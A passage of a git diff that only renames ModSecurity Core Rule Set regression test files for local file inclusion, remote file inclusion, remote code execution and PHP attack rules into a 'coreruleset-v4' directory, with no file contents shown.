rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml
